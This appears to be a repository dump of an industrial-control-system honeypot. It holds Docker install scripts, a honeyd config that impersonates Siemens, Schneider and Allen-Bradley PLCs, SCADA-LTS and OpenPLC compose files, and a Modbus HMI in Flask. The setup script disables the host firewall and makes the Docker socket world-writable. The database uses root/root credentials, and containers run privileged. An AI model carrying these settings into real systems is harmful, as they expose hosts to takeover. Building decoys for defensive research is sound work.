22 | 3. Use the following command to set up the repository:
23 |
24 |
25 | ``` bash
26 | echo \
27 | "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
28 | $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
29 |
30 | ```
31 | 4. Update the apt package index:
32 | ```bash
33 | sudo apt-get update
34 | ```
35 |
36 |    Receiving a GPG error when running `apt-get update`? Your default umask may be incorrectly configured, preventing detection of the repository public key file. Try granting read permission for the Docker public key file before updating the package index:
37 |
38 | ```bash
39 | sudo chmod a+r /etc/apt/keyrings/docker.gpg
40 | sudo apt-get update
41 | ```
41 |
42 | 5. Install Docker Engine, containerd, and Docker Compose:
43 | ``` bash
44 | sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin docker-compose
45 | ```
46 | If you get a permission-denied error while trying to connect to the Docker daemon socket:
47 |
48 | ``` bash
49 | sudo chmod 666 /var/run/docker.sock
50 | ```
51 |
52 | 6. Create the Docker network.
53 |
54 | Docker network for icsnet
55 |
56 | ``` bash
57 | docker network create --driver=bridge --subnet=192.168.0.0/24 --gateway=192.168.0.1 --opt com.docker.network.bridge.name=br_icsnet icsnet
58 |
59 | ```
60 | Docker network for phynet
61 | ``` bash
62 | docker network create --driver=bridge --subnet=192.168.1.0/24 --gateway=192.168.1.1 --opt com.docker.network.bridge.name=br_phynet phynet
63 | ```
--------------------------------------------------------------------------------
/doc/honeyd.md:
--------------------------------------------------------------------------------
1 | sudo docker run -v path/to/log:/app/logs/ -p "ports" honeypot
--------------------------------------------------------------------------------
/doc/icssim.md:
--------------------------------------------------------------------------------
1 | # Installation of ICSSIM
3 |
4 | ``` bash
5 | cd bottlefactory
6 |
7 | #DOCKER_COMPOSE UP
8 | sudo docker-compose up -d
9 |
10 |
11 |
12 | ```
--------------------------------------------------------------------------------
/doc/images/VirtuePot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/images/VirtuePot.png
--------------------------------------------------------------------------------
/doc/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/images/logo.png
--------------------------------------------------------------------------------
/doc/openplc.md:
--------------------------------------------------------------------------------
1 | ## Install [OpenPLC_V2](https://github.com/thiagoralves/OpenPLC_v2) on Docker
2 |
3 | **http://www.openplcproject.com/**
4 |
5 | ``` bash
6 | cd OpenPLC
7 | docker build -t openplc .
8 | #docker network create --subnet=172.25.0.0/16 mynet
9 | #docker pull nikhilkc96/openplc
10 | docker run -d --rm --privileged -p 8080:8080 -p 502:502 --net icsnet --ip 192.168.0.40 openplc
11 | ```
12 |
--------------------------------------------------------------------------------
/doc/scada.md:
--------------------------------------------------------------------------------
1 | # Installation of SCADA
3 |
4 | ``` bash
5 | cd scada
6 |
7 | #DOCKER_COMPOSE UP
8 | sudo docker-compose up -d
9 |
10 | ```
--------------------------------------------------------------------------------
/doc/zeek.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/zeek.md
--------------------------------------------------------------------------------
/honeyd/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:xenial
2 |
3 | RUN apt-get update
4 | RUN apt-get install -y build-essential \
5 | libpcap-dev \
6 | libdnet-dev \
7 | libevent-dev \
8 | libpcre3-dev \
9 | make \
10 | bzip2 \
11 | nmap \
12 | psmisc \
13 | libtool \
14 | libdumbnet-dev \
15 | zlib1g-dev \
16 | rrdtool \
17 | net-tools \
18 | git-core \
19 | libreadline-dev \
20 | libedit-dev \
21 | bison \
22 | flex \
23 | farpd \
24 | lftp \
25 | iputils-ping \
26 | sudo \
27 | automake
28 |
29 | RUN git clone https://github.com/DataSoft/Honeyd.git
30 | RUN cd Honeyd \
31 | && ./autogen.sh \
32 | && ./configure \
33 | && make \
34 | && make install
35 |
36 |
37 | RUN apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
38 |
39 |
40 | RUN mkdir -p /app/logs
41 | RUN touch "/app/logs/test.log"
42 | RUN ls -alh /app
43 | RUN ip a
44 |
45 | ADD honeyd.conf .
46 | # ADD Siemens-S7-1200.py .
47 | # # Ports
48 | # EXPOSE 502 102
49 | ADD libsnap7.so /usr/lib/libsnap7.so
50 | ADD s7commServer /usr/share/honeyd/s7commServer
51 | RUN chmod 777 /usr/share/honeyd/s7commServer
52 | # CMD ["honeyd", "-d", "-i", "eth0", "-f", "honeyd.conf", "-l", "/app/logs/test.log"]
53 | #"-d", "-f", "honeyd.conf", "-l", "/app/logs/test.log"]
54 |
55 |
--------------------------------------------------------------------------------
/honeyd/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | honeyd:
4 | build: .
5 | privileged: true
6 | entrypoint: ["honeyd", "-d", "-i", "eth0", "-f", "honeyd.conf", "-l", "/app/logs/test.log"]
7 | container_name: honeyd
8 | volumes:
9 | - src:/app/logs/
10 | ports:
11 | - 505:502
12 | - 102:102
13 | networks:
14 | fnet:
15 | ipv4_address: 192.168.1.32
16 |
17 |
18 | networks:
19 | wnet:
20 | driver: bridge
21 | name: icsnet
22 | ipam:
23 | config:
24 | - subnet: 192.168.0.0/24
25 | gateway: 192.168.0.1
26 | driver_opts:
27 | com.docker.network.bridge.name: br_icsnet
28 | fnet:
29 | driver: bridge
30 | name: phynet
31 | ipam:
32 | config:
33 | - subnet: 192.168.1.0/24
34 | gateway: 192.168.1.1
35 | driver_opts:
36 | com.docker.network.bridge.name: br_phynet
37 |
38 |
39 | volumes:
40 | src:
--------------------------------------------------------------------------------
/honeyd/honeyd.conf:
--------------------------------------------------------------------------------
1 | create schneider_m221
2 | set schneider_m221 personality "Schneider Electric TSX ETY programmable logic controller"
3 | set schneider_m221 default tcp action reset
4 | add schneider_m221 tcp port 502 proxy 0.0.0.0:502
5 | set schneider_m221 default icmp action open
6 | set schneider_m221 ethernet "28:29:86:F9:7C:6E"
7 | bind 192.168.1.168 schneider_m221
8 |
9 | create siemens_s7_300
10 | set siemens_s7_300 personality "Siemens Simatic 300 programmable logic controller"
11 | set siemens_s7_300 default tcp action reset
12 | add siemens_s7_300 subsystem "/usr/share/honeyd/s7commServer" shared restart
13 | set siemens_s7_300 default icmp action open
14 | set siemens_s7_300 ethernet "00:1C:06:0C:2E:C6"
15 | bind 192.168.1.169 siemens_s7_300
16 |
17 | create allen_bradley_plc5
18 | set allen_bradley_plc5 personality "Allen-Bradley PLC-5 programmable logic controller"
19 | add allen_bradley_plc5 tcp port 503 proxy 0.0.0.0:503
20 | set allen_bradley_plc5 default icmp action open
21 | set allen_bradley_plc5 ethernet "00:00:BC:18:51:A2"
22 | bind 192.168.1.170 allen_bradley_plc5
23 |
24 | create siemens_s7_1200
25 | set siemens_s7_1200 personality "Siemens Simatic 1200 programmable logic controller"
26 | add siemens_s7_1200 tcp port 504 proxy 0.0.0.0:504
27 | set siemens_s7_1200 default icmp action open
28 | set siemens_s7_1200 ethernet "8C:F3:19:D9:A6:11"
29 | bind 192.168.1.171 siemens_s7_1200
--------------------------------------------------------------------------------
/honeyd/libsnap7.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/honeyd/libsnap7.so
--------------------------------------------------------------------------------
/honeyd/s7commServer:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/honeyd/s7commServer
--------------------------------------------------------------------------------
/init.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | cwd=$(pwd)
4 | version=$(lsb_release -rs )
5 |
6 | # Wrong version warning
7 | if [ "$version" != "22.04" ] && [ "$version" != "20.04" ] && [ "$version" != "18.04" ];
8 | then
9 |     printf "Warning! This installation script has only been tested on Ubuntu 18.04, 20.04, and 22.04 LTS and may not work on your Ubuntu version.\n\n"
10 | fi
11 |
12 | #install docker and docker-compose
13 | echo "Install Docker on your Ubuntu system."
14 | read -p "Do you want to proceed with the installation? (y/n): " choice
15 |
16 | if [ "$choice" != "y" ]; then
17 | echo "Installation aborted."
18 | exit 1
19 | fi
20 |
21 | echo "Updating package index..."
22 | sudo apt-get update
23 | sudo apt-get install \
24 | ca-certificates \
25 | curl \
26 | gnupg \
27 | lsb-release
28 |
29 | echo "Installing dependencies..."
30 | sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
31 |
32 | echo "Adding Docker's official GPG key..."
33 |
34 | sudo mkdir -p /etc/apt/keyrings
35 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
36 |
37 | echo "Adding Docker repository..."
38 | echo \
39 | "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
40 | $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
41 |
42 | echo "Updating package index again..."
43 | sudo chmod a+r /etc/apt/keyrings/docker.gpg
44 | sudo apt-get update
45 |
46 | echo "Installing Docker..."
47 | sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin docker-compose
48 |
49 | echo "Docker installation completed!"
50 | # For permission-denied errors when connecting to the Docker daemon socket
51 | sudo chmod 666 /var/run/docker.sock
52 |
53 |
54 | sleep 3
55 |
56 | # Update apt
57 | sudo apt update
58 | # Disable the firewall
59 | sudo ufw disable
60 | # Set vm.max_map_count for Elasticsearch
61 | sudo sysctl -w vm.max_map_count=262144
62 |
63 | # RUN Bottle Factory
64 | docker-compose -f bottlefactory/docker-compose.yml up -d
65 |
66 | # RUN Water tank Openplc
67 | docker-compose -f watertank/docker-compose.yml up -d
68 |
69 |
70 | # RUN SCADA LTS
71 | docker-compose -f scada/docker-compose.yml up -d
72 |
73 |
74 | #Run the zeek
75 | docker-compose -f zeek/docker-compose.yml up -d
76 |
77 |
78 | #Run the honeyd
79 | docker-compose -f honeyd/docker-compose.yml up -d
80 |
81 |
82 | #Check the running containers
83 | docker ps
--------------------------------------------------------------------------------
/log/MaliciousvsBenign.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/MaliciousvsBenign.pdf
--------------------------------------------------------------------------------
/log/Modbus.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/Modbus.pdf
--------------------------------------------------------------------------------
/log/countries_comparison.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/countries_comparison.pdf
--------------------------------------------------------------------------------
/log/dest_ports.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/dest_ports.pdf
--------------------------------------------------------------------------------
/log/http_methods.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/http_methods.pdf
--------------------------------------------------------------------------------
/log/modbus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/modbus.png
--------------------------------------------------------------------------------
/log/organization_stacked.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/organization_stacked.pdf
--------------------------------------------------------------------------------
/log/organizations.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/organizations.pdf
--------------------------------------------------------------------------------
/log/uniqueip.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/uniqueip.pdf
--------------------------------------------------------------------------------
/log/world_cloud&vsix.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/world_cloud&vsix.pdf
--------------------------------------------------------------------------------
/log/world_cloud.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/world_cloud.pdf
--------------------------------------------------------------------------------
/log/world_vsix.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/log/world_vsix.pdf
--------------------------------------------------------------------------------
/restart_docker_containers.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # Add "@hourly /path/to/restart_docker_containers.sh" to the crontab (edit with: crontab -e)
3 | # Get a list of all Docker containers
4 | containers=$(docker ps -a -q)
5 |
6 | # Iterate through each container
7 | for container in $containers
8 | do
9 | # Check if the container is stopped
10 | if [ "$(docker inspect -f '{{.State.Status}}' $container)" = "exited" ]; then
11 | # Restart the container
12 | docker restart $container
13 | echo "Container $container restarted."
14 | fi
15 | done
16 |
17 | echo "Finished checking and restarting Docker containers."
18 |
--------------------------------------------------------------------------------
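The shell loop above can be reduced to a single filtering step: keep only the container IDs whose inspected status is `exited`. A minimal Python sketch of that filter, where the `statuses` dict stands in for repeated `docker inspect -f '{{.State.Status}}' <id>` calls (no Docker daemon is contacted):

```python
def exited_containers(statuses):
    """Return the IDs whose status is 'exited' (mirrors the shell loop above)."""
    return [cid for cid, state in statuses.items() if state == "exited"]

# In the real script, each value comes from `docker inspect`; here they
# are hard-coded to illustrate the selection logic only.
print(exited_containers({"abc123": "exited", "def456": "running"}))  # → ['abc123']
```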
/scada/HMI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/scada/HMI.png
--------------------------------------------------------------------------------
/scada/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/scada/README.md
--------------------------------------------------------------------------------
/scada/Water Tank.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/scada/Water Tank.zip
--------------------------------------------------------------------------------
/scada/docker-compose.yml:
--------------------------------------------------------------------------------
1 | # Docker Compose file to manage the deployed images.
2 | # Uses MySQL Server 5.7 and the latest local Scada-LTS build.
3 | # The attached webapps folder lets developers modify static content from the host OS.
4 | # Attach a shell to stop the Tomcat instance; it can then be run in JPDA (debug) mode.
5 | version: '3'
6 | services:
7 | database:
8 | container_name: mysql
9 | image: mysql/mysql-server:5.7
10 | ports:
11 | - "3306:3306"
12 | environment:
13 | - MYSQL_ROOT_PASSWORD=root
14 | - MYSQL_USER=root
15 | - MYSQL_PASSWORD=root
16 | - MYSQL_DATABASE=scadalts
17 | expose: ["3306"]
18 | volumes:
19 | - scada_databases:/home/
20 | networks:
21 | wnet:
22 | ipv4_address: 192.168.0.24
23 | scadalts:
24 | image: scadalts/scadalts:latest
25 | environment:
26 | - CATALINA_OPTS=-Xmx512m -Xms512m
27 | ports:
28 | - "8000:8080"
29 | depends_on:
30 | - database
31 | expose: ["8080", "8000"]
32 | links:
33 | - database:database
34 | command:
35 | - /usr/bin/wait-for-it
36 | - --host=database
37 | - --port=3306
38 | - --timeout=30
39 | - --strict
40 | - --
41 | - /usr/local/tomcat/bin/catalina.sh
42 | - run
43 | networks:
44 | wnet:
45 | ipv4_address: 192.168.0.25
46 |
47 |
48 | networks:
49 | wnet:
50 | driver: bridge
51 | name: icsnet
52 | ipam:
53 | config:
54 | - subnet: 192.168.0.0/24
55 | gateway: 192.168.0.1
56 | driver_opts:
57 | com.docker.network.bridge.name: br_icsnet
58 | fnet:
59 | driver: bridge
60 | name: phynet
61 | ipam:
62 | config:
63 | - subnet: 192.168.1.0/24
64 | gateway: 192.168.1.1
65 | driver_opts:
66 | com.docker.network.bridge.name: br_phynet
67 |
68 |
69 | volumes:
70 | scada_databases:
--------------------------------------------------------------------------------
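The `command` in the `scadalts` service wraps `catalina.sh` with `wait-for-it`, which blocks until the database's TCP port accepts connections. A minimal sketch of that polling behaviour (demonstrated against a throwaway local listener rather than the MySQL container):

```python
import socket
import time

def wait_for_port(host, port, timeout=5.0):
    """Poll host:port until a TCP connect succeeds or the timeout elapses."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with socket.create_connection((host, port), timeout=0.5):
                return True
        except OSError:
            time.sleep(0.1)  # not up yet; retry
    return False

# Demo: a local listener on an ephemeral port stands in for database:3306.
srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(1)
print(wait_for_port("127.0.0.1", srv.getsockname()[1], timeout=2.0))  # → True
srv.close()
```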
/tcpdump_start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | rm -f nohup.out
3 | sudo nohup tcpdump -ni ens160 -s 65535 -w captured_packets.pcap &
4 |
5 | # Record the backgrounded command's PID (this is sudo's PID; sudo relays signals to tcpdump)
6 | echo $! > /var/run/tcpdump.pid
7 |
--------------------------------------------------------------------------------
/tcpdump_stop.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | if [ -f /var/run/tcpdump.pid ]
3 | then
4 | sudo kill `cat /var/run/tcpdump.pid`
5 | echo "tcpdump (PID `cat /var/run/tcpdump.pid`) killed."
6 | rm -f /var/run/tcpdump.pid
7 | else
8 | echo tcpdump not running.
9 | fi
--------------------------------------------------------------------------------
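The two scripts above share a simple PID-file handshake: record a PID on start; read, report, and remove it on stop. A minimal sketch of that pattern, where a temp file stands in for `/var/run/tcpdump.pid` and no process is actually signalled:

```python
import os
import tempfile

PID_FILE = os.path.join(tempfile.mkdtemp(), "tcpdump.pid")

def start(pid):
    with open(PID_FILE, "w") as f:    # tcpdump_start.sh: echo $! > pidfile
        f.write(str(pid))

def stop():
    if not os.path.exists(PID_FILE):  # tcpdump_stop.sh: "tcpdump not running."
        return None
    with open(PID_FILE) as f:
        pid = int(f.read())
    os.remove(PID_FILE)               # tcpdump_stop.sh: rm -f pidfile
    return pid                        # the caller would os.kill(pid, SIGTERM)

start(4242)
print(stop())  # → 4242
```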
/watertank/README.md:
--------------------------------------------------------------------------------
1 | ## Open PLC
--------------------------------------------------------------------------------
/watertank/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | openplc:
4 | build:
5 | context: ./openplc
6 | dockerfile: Dockerfile
7 | # image: nikhilkc96/openplc
8 | stdin_open: true # docker run -i
9 | tty: true
10 | privileged: true
11 | # entrypoint: ["honeyd", "-d", "-f", "honeyd.conf", "-l", "honeyd.log"]
12 | container_name: openplc
13 | volumes:
14 | - "/etc/timezone:/etc/timezone:ro"
15 | - "/etc/localtime:/etc/localtime:ro"
16 | - openplc_data:/home
17 | ports:
18 | - 8080:8080
19 | - 502:502
20 | networks:
21 | wnet:
22 | ipv4_address: 192.168.0.26
23 | fnet:
24 | ipv4_address: 192.168.1.13
25 |
26 |
27 | openplc_hmi:
28 | build:
29 | context: ./hmi
30 | dockerfile: Dockerfile
31 | stdin_open: true # docker run -i
32 | tty: true
33 | privileged: true
34 | entrypoint: ["gunicorn", "app:app", "-b", "0.0.0.0:5000"]
35 | container_name: openplc_hmi
36 | volumes:
37 | - "/etc/timezone:/etc/timezone:ro"
38 | - "/etc/localtime:/etc/localtime:ro"
39 | ports:
40 | - 5000:5000
41 | networks:
42 | wnet:
43 | ipv4_address: 192.168.0.27
44 |
45 |
46 | openplc_simulation:
47 | container_name: openplc_sim_server
48 | build:
49 | context: ./openplc_sim
50 | dockerfile: Dockerfile
51 | stdin_open: true # docker run -i
52 | tty: true
53 | privileged: true
54 | # entrypoint: ["python3", "tcp_modbus.py"]
55 | networks:
56 | wnet:
57 | ipv4_address: 192.168.0.28
58 |
59 |
60 | networks:
61 | wnet:
62 | driver: bridge
63 | name: icsnet
64 | ipam:
65 | config:
66 | - subnet: 192.168.0.0/24
67 | gateway: 192.168.0.1
68 | driver_opts:
69 | com.docker.network.bridge.name: br_icsnet
70 | fnet:
71 | driver: bridge
72 | name: phynet
73 | ipam:
74 | config:
75 | - subnet: 192.168.1.0/24
76 | gateway: 192.168.1.1
77 | driver_opts:
78 | com.docker.network.bridge.name: br_phynet
79 |
80 |
81 |
82 | volumes:
83 | openplc_data:
--------------------------------------------------------------------------------
/watertank/hmi/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.9-slim-buster
2 |
3 | COPY . /hmi
4 |
5 | WORKDIR /hmi
6 |
7 | RUN pip3 install -r requirements.txt
8 |
9 | RUN chmod +x docker_entrypoint.sh
10 |
11 | # CMD ["gunicorn", "app:app", "-b", "0.0.0.0:5000"]
12 |
13 | # CMD ["./docker_entrypoint.sh"]
--------------------------------------------------------------------------------
/watertank/hmi/app.py:
--------------------------------------------------------------------------------
1 | from flask import Flask, render_template, current_app
2 | from pymodbus.client.sync import ModbusTcpClient
3 | from datetime import datetime
4 | from flask import jsonify
5 | import secrets
6 |
7 |
8 | app = Flask(__name__)
9 |
10 |
11 | secret_key = secrets.token_hex(16)
12 | # example output, secret_key = 000d88cd9d90036ebdd237eb6b0db000
13 | app.config['SECRET_KEY'] = secret_key
14 |
15 | # Return the current date and time as an ISO-8601 string
16 | def current_time():
17 | now = datetime.now().isoformat()
18 | return now
19 |
20 | @app.route('/api',methods=['POST','GET'])
21 | def api():
22 | host = '192.168.0.26'
23 | port = 502
24 | client = ModbusTcpClient(host, port)
25 | client.connect()
26 | result = client.read_holding_registers(101, 10, unit=0)
27 | client.close()
28 | # A failed read returns a Modbus exception response, not registers
29 | if result.isError():
30 | return jsonify({"datetime": current_time(), "error": str(result)}), 502
31 | data = {
32 | "datetime": current_time(),
33 | "data": result.registers
34 | }
35 | return jsonify(data)
36 |
37 | @app.route('/')
38 | def index():
39 | return render_template('index.html')
40 |
41 | if __name__ == '__main__':
42 |
43 | # port = int(os.environ.get('PORT', 7000))
44 | app.run()
--------------------------------------------------------------------------------
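For reference, the `/api` route above returns a JSON object with a timestamp and the ten register values it read. A minimal sketch of that payload shape, with dummy register values standing in for a live Modbus read (no PLC is contacted here):

```python
import json
from datetime import datetime

def build_payload(registers):
    """Mirror the dict the /api route assembles before jsonify()."""
    return {"datetime": datetime.now().isoformat(), "data": registers}

# Dummy values in place of result.registers from the holding-register read.
body = json.dumps(build_payload([17, 0, 0, 1, 0, 0, 0, 0, 0, 0]))
print(body)
```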
/watertank/hmi/docker_entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | python3 tcp_modbus.py &  # background the helper; 'exec' here would only replace a subshell
6 | exec gunicorn app:app -b 0.0.0.0:5000
--------------------------------------------------------------------------------
/watertank/hmi/gunicorn.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | gunicorn --chdir app app:app -w 2 --threads 2 -b 0.0.0.0:5000
--------------------------------------------------------------------------------
/watertank/hmi/requirements.txt:
--------------------------------------------------------------------------------
1 | click==7.1.2
2 | Flask==2
3 | itsdangerous==2.0
4 | Jinja2==3.0
5 | MarkupSafe==2.0.0
6 | Werkzeug==2.0
7 | pymodbus==2.5.3
8 | pyserial==3.5
9 | six==1.16.0
10 | gunicorn==20.0.4
11 |
--------------------------------------------------------------------------------
/watertank/hmi/static/css/styles.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/css/styles.css
--------------------------------------------------------------------------------
/watertank/hmi/static/imgs/siemens_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/imgs/siemens_logo.png
--------------------------------------------------------------------------------
/watertank/hmi/static/imgs/tank.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/imgs/tank.jpeg
--------------------------------------------------------------------------------
/watertank/hmi/static/imgs/user-avatar-with-check-mark.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/imgs/user-avatar-with-check-mark.png
--------------------------------------------------------------------------------
/watertank/hmi/static/js/main.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/hmi/static/js/main.js
--------------------------------------------------------------------------------
/watertank/openplc-program/beremiz.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Config0.c:
--------------------------------------------------------------------------------
1 | /*******************************************/
2 | /* FILE GENERATED BY iec2c */
3 | /* Editing this file is not recommended... */
4 | /*******************************************/
5 |
6 | #include "iec_std_lib.h"
7 |
8 | #include "accessor.h"
9 |
10 | #include "POUS.h"
11 |
12 | // CONFIGURATION CONFIG0
13 |
14 | void RES0_init__(void);
15 |
16 | void config_init__(void) {
17 | BOOL retain;
18 | retain = 0;
19 |
20 | RES0_init__();
21 | }
22 |
23 | void RES0_run__(unsigned long tick);
24 |
25 | void config_run__(unsigned long tick) {
26 | RES0_run__(tick);
27 | }
28 | unsigned long long common_ticktime__ = 20000000ULL; /*ns*/
29 | unsigned long greatest_tick_count__ = 0UL; /*tick*/
30 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Config0.h:
--------------------------------------------------------------------------------
1 | #include "beremiz.h"
2 |
3 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Config0.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/Config0.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/LOCATED_VARIABLES.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/LOCATED_VARIABLES.h
--------------------------------------------------------------------------------
/watertank/openplc-program/build/POUS.c:
--------------------------------------------------------------------------------
1 | #include "POUS.h"
2 | void LOGGER_init__(LOGGER *data__, BOOL retain) {
3 | __INIT_VAR(data__->EN,__BOOL_LITERAL(TRUE),retain)
4 | __INIT_VAR(data__->ENO,__BOOL_LITERAL(TRUE),retain)
5 | __INIT_VAR(data__->TRIG,__BOOL_LITERAL(FALSE),retain)
6 | __INIT_VAR(data__->MSG,__STRING_LITERAL(0,""),retain)
7 | __INIT_VAR(data__->LEVEL,LOGLEVEL__INFO,retain)
8 | __INIT_VAR(data__->TRIG0,__BOOL_LITERAL(FALSE),retain)
9 | }
10 |
11 | // Code part
12 | void LOGGER_body__(LOGGER *data__) {
13 | // Control execution
14 | if (!__GET_VAR(data__->EN)) {
15 | __SET_VAR(data__->,ENO,,__BOOL_LITERAL(FALSE));
16 | return;
17 | }
18 | else {
19 | __SET_VAR(data__->,ENO,,__BOOL_LITERAL(TRUE));
20 | }
21 | // Initialise TEMP variables
22 |
23 | if ((__GET_VAR(data__->TRIG,) && !(__GET_VAR(data__->TRIG0,)))) {
24 | #define GetFbVar(var,...) __GET_VAR(data__->var,__VA_ARGS__)
25 | #define SetFbVar(var,val,...) __SET_VAR(data__->,var,__VA_ARGS__,val)
26 |
27 | LogMessage(GetFbVar(LEVEL),(char*)GetFbVar(MSG, .body),GetFbVar(MSG, .len));
28 |
29 | #undef GetFbVar
30 | #undef SetFbVar
31 | ;
32 | };
33 | __SET_VAR(data__->,TRIG0,,__GET_VAR(data__->TRIG,));
34 |
35 | goto __end;
36 |
37 | __end:
38 | return;
39 | } // LOGGER_body__()
40 |
41 |
42 |
43 |
44 |
45 | void MAIN_init__(MAIN *data__, BOOL retain) {
46 | __INIT_VAR(data__->I_PBFILL,__BOOL_LITERAL(FALSE),retain)
47 | __INIT_VAR(data__->I_PBDISCHARGE,__BOOL_LITERAL(TRUE),retain)
48 | __INIT_VAR(data__->Q_FILLVALVE,__BOOL_LITERAL(FALSE),retain)
49 | __INIT_VAR(data__->Q_FILLLIGHT,__BOOL_LITERAL(FALSE),retain)
50 | __INIT_VAR(data__->Q_DISCHARGEVALVE,__BOOL_LITERAL(FALSE),retain)
51 | __INIT_VAR(data__->Q_LIGHTDISCHARGE,__BOOL_LITERAL(FALSE),retain)
52 | __INIT_VAR(data__->Q_DISPLAY,0,retain)
53 | __INIT_VAR(data__->FILLING,__BOOL_LITERAL(FALSE),retain)
54 | __INIT_VAR(data__->DISCHARGING,__BOOL_LITERAL(FALSE),retain)
55 | __INIT_VAR(data__->TIMEFILLING,__time_to_timespec(1, 0, 0, 0, 0, 0),retain)
56 | __INIT_VAR(data__->TIMEFILLINGINT,0,retain)
57 | __INIT_VAR(data__->TIMEDISCHARGING,__time_to_timespec(1, 0, 0, 0, 0, 0),retain)
58 | __INIT_VAR(data__->TIMEDISCHARGINGINT,0,retain)
59 | TON_init__(&data__->TON0,retain);
60 | RS_init__(&data__->RS0,retain);
61 | R_TRIG_init__(&data__->R_TRIG0,retain);
62 | TON_init__(&data__->TON1,retain);
63 | RS_init__(&data__->RS1,retain);
64 | F_TRIG_init__(&data__->F_TRIG0,retain);
65 | __INIT_VAR(data__->PLACEHOLDER,0,retain)
